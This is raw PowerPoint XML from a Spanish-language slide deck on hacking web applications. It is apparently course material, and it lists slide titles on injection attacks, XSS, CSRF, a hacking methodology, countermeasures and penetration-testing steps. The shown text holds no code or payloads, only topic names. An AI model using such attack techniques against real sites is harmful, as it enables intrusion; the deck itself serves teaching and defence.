            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ofuscación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de protocolo DMZ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de administración de seguridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4373138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smtClean="0"/>
              <a:t>Testear Autenticación</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310234472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403648" y="316983"/>
            <a:ext cx="6336704" cy="6224035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40124005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smtClean="0"/>
              <a:t>Testear Administración de la Sesión</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41885329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403648" y="188640"/>
            <a:ext cx="6359190" cy="6192688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23448564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smtClean="0"/>
              <a:t>Testear Autorización</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8170018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793388" y="869578"/>
            <a:ext cx="7393127" cy="5007693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22508649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smtClean="0"/>
              <a:t>Testear Validación de Datos</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40730301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323528" y="63629"/>
            <a:ext cx="8424936" cy="6749748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15698184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smtClean="0"/>
              <a:t>Testear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23047839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337259" y="77953"/>
            <a:ext cx="4469482" cy="6702094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1921323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794</TotalTime>
  <Words>5174</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentación en pantalla (4:3)</PresentationFormat>
  <Paragraphs>465</Paragraphs>
  <Slides>104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104</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="108" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft New Tai Lue</vt:lpstr>
      <vt:lpstr>Blue-Grey-PowerPoint-Template</vt:lpstr>
      <vt:lpstr>13. Hackeando Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>Componentes de una aplicación Web</vt:lpstr>
      <vt:lpstr>Aplicaciones Web 2.0</vt:lpstr>
      <vt:lpstr>Pila de vulnerabilidad</vt:lpstr>
      <vt:lpstr>Vectores de ataque Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Amenazas a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Entradas no válidas</vt:lpstr>
      <vt:lpstr>Consulta Modificada</vt:lpstr>
      <vt:lpstr>Manipulación de parámetros/formularios</vt:lpstr>
      <vt:lpstr>Manipulación de parámetros/formularios</vt:lpstr>
      <vt:lpstr>Directory Traversal</vt:lpstr>
      <vt:lpstr>Mala configuración de seguridad</vt:lpstr>
      <vt:lpstr>Mala configuración de seguridad</vt:lpstr>
      <vt:lpstr>Inyección de fallas</vt:lpstr>
      <vt:lpstr>Ataques SQL Injection</vt:lpstr>
      <vt:lpstr>Ataques de inyección de comandos</vt:lpstr>
      <vt:lpstr>Ataques de inyección de comandos</vt:lpstr>
      <vt:lpstr>¿Qué es inyección LDAP?</vt:lpstr>
      <vt:lpstr>¿Como trabaja la inyección LDAP?</vt:lpstr>
      <vt:lpstr>¿Como trabaja la inyección LDAP?</vt:lpstr>
      <vt:lpstr>Ataque de manipulación de campo escondido</vt:lpstr>
      <vt:lpstr>Ataques Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Ataque Cross-Site Request Rorgery (CSRF)</vt:lpstr>
      <vt:lpstr>Ataque DoS a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Ataque DoS a las aplicaciones Web</vt:lpstr>
      <vt:lpstr>Ataques Buffer Overflow</vt:lpstr>
      <vt:lpstr>Cookie/Session Poisoning</vt:lpstr>
      <vt:lpstr>Ataque de fijación de sesión</vt:lpstr>
      <vt:lpstr>Protección en la capa de transporte insuficiente</vt:lpstr>
      <vt:lpstr>Manipulación de errores inapropiados</vt:lpstr>
      <vt:lpstr>Almacenamiento criptográfico inseguro</vt:lpstr>
      <vt:lpstr>Autenticación roto y administración de sesión</vt:lpstr>
      <vt:lpstr>Redirecciones y renvíos inválidos</vt:lpstr>
      <vt:lpstr>Ataque a los servicios Web</vt:lpstr>
      <vt:lpstr>Pila de los servicios Web</vt:lpstr>
      <vt:lpstr>Pila de los servicios Web</vt:lpstr>
      <vt:lpstr>Ataque footprinting a los Servicios Web</vt:lpstr>
      <vt:lpstr>XML Poisoning a los servicios Web</vt:lpstr>
      <vt:lpstr>Metodología Hacking</vt:lpstr>
      <vt:lpstr>1. Footprinting Web Infraestructure</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Discovery </vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Discovery</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Server Identification/Banner Grabbing </vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Hidden Content Discovery</vt:lpstr>
      <vt:lpstr>Footprinting Web Infraestructure: Hidden Content Discovery</vt:lpstr>
      <vt:lpstr>2. Attack Web Servers</vt:lpstr>
      <vt:lpstr>3. Analize Web Applications</vt:lpstr>
      <vt:lpstr>3. Analize Web Applications</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>4. Attack Authentication Mechanism</vt:lpstr>
      <vt:lpstr>5. Attack Authorization Schemes</vt:lpstr>
      <vt:lpstr>6. Attack Session Management Mechanism</vt:lpstr>
      <vt:lpstr>7. Perform Injection Attacks</vt:lpstr>
      <vt:lpstr>8. Attack Data Connectivity</vt:lpstr>
      <vt:lpstr>8. Attack Data Connectivity</vt:lpstr>
      <vt:lpstr>9. Attack Web App Client</vt:lpstr>
      <vt:lpstr>10. Attack Web Services</vt:lpstr>
      <vt:lpstr>Herramientas hacking Web</vt:lpstr>
      <vt:lpstr>Herramientas hacking Web</vt:lpstr>
      <vt:lpstr>Contramedidas.</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques SQL Injection?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques SQL Injection?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra las fallas de inyección de comandos?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques XSS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques XSS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse contra ataques DoS?</vt:lpstr>
      <vt:lpstr>¿Cómo defenderse de los ataques de servicios Web?</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Herramientas de Seguridad</vt:lpstr>
      <vt:lpstr>Herramientas de Seguridad</vt:lpstr>
      <vt:lpstr>Test de Intrusión a Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Test de Intrusión Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Obtener Información</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear la administración de la configuración</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Autenticación</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Administración de la Sesión</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Autorización</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Validación de Datos</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear DoS</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Servicios Web</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Testear Ajax</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>¡Muchas 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cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-09T01:50:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-08T01:29:22Z</dcterms:modified>
</cp:coreProperties>
</file>